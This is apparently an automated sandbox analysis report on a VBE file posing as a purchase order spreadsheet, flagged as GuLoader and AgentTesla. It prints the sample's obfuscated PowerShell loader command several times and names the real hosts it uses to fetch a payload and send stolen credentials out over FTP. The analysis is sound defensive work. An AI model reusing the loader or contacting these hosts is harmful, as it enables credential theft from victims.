Windows Analysis Report
PO-08784 xlsx.vbe

Overview

General Information

Sample Name: PO-08784 xlsx.vbe
Analysis ID: 755441
MD5: 266115592f966240c14dfeeec624bdf5
SHA1: 455a06b52d8e8f46d9a80067d3d1b1ea23036d65
SHA256: 1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
May check the online IP address of the machine
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: ftp.mcmprint.net Virustotal: Detection: 9% Perma Link
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: unknown HTTPS traffic detected: 54.91.59.199:443 -> 192.168.11.20:49805 version: TLS 1.2
Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.pdb source: powershell.exe, 00000004.00000002.1687266902.0000000004531000.00000004.00000800.00020000.00000000.sdmp

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.11.20:49807 -> 185.31.121.136:21
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49808 -> 185.31.121.136:56411
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 54.91.59.199 54.91.59.199
Source: Joe Sandbox View IP Address: 54.91.59.199 54.91.59.199
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/includes/UtXRqIMUipDp192.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49808 -> 185.31.121.136:56411
Uses FTP
Source: unknown FTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49807 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000011.00000002.5824869400.000000000152A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfb
Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000002.5900965300.000000001FC83000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000003.1767910735.000000001FC3F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000011.00000003.1767910735.000000001FC3F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kmbImL.com
Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://oqyPj4HORVpk3nSGGk.net
Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://oqyPj4HORVpk3nSGGk.netXy
Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.orgftp://ftp.mcmprint.netklogz
Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: b3solutionscws.com
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D5FA09A recv, 17_2_1D5FA09A
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/includes/UtXRqIMUipDp192.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache
Source: unknown HTTPS traffic detected: 54.91.59.199:443 -> 192.168.11.20:49805 version: TLS 1.2

System Summary
barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T Jump to behavior
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 4705
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 4705 Jump to behavior
Yara signature match
Source: PO-08784 xlsx.vbe, type: SAMPLE Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00C5A648 4_2_00C5A648
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00C5EB00 4_2_00C5EB00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00C5EB10 4_2_00C5EB10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C6C3E0 4_2_07C6C3E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C6D0D0 4_2_07C6D0D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C6DA18 4_2_07C6DA18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CB4EA8 4_2_07CB4EA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CB78B0 4_2_07CB78B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CB25A9 4_2_07CB25A9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CB25B8 4_2_07CB25B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D352C0 4_2_07D352C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D352B8 4_2_07D352B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D30040 4_2_07D30040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D30007 4_2_07D30007
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C64481 4_2_07C64481
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D770B8D 17_2_1D770B8D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1F9CE5EA 17_2_1F9CE5EA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1F9C8B70 17_2_1F9C8B70
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1F9C7400 17_2_1F9C7400
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_2037AC70 17_2_2037AC70
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_203794D0 17_2_203794D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20374510 17_2_20374510
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_2037DE10 17_2_2037DE10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20376688 17_2_20376688
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20370B12 17_2_20370B12
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20451540 17_2_20451540
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20454460 17_2_20454460
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20452D03 17_2_20452D03
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_204548A0 17_2_204548A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_204514D4 17_2_204514D4
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D5FB206 NtQuerySystemInformation, 17_2_1D5FB206
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D5FB1D5 NtQuerySystemInformation, 17_2_1D5FB1D5
Tries to load missing DLLs
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: security.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo 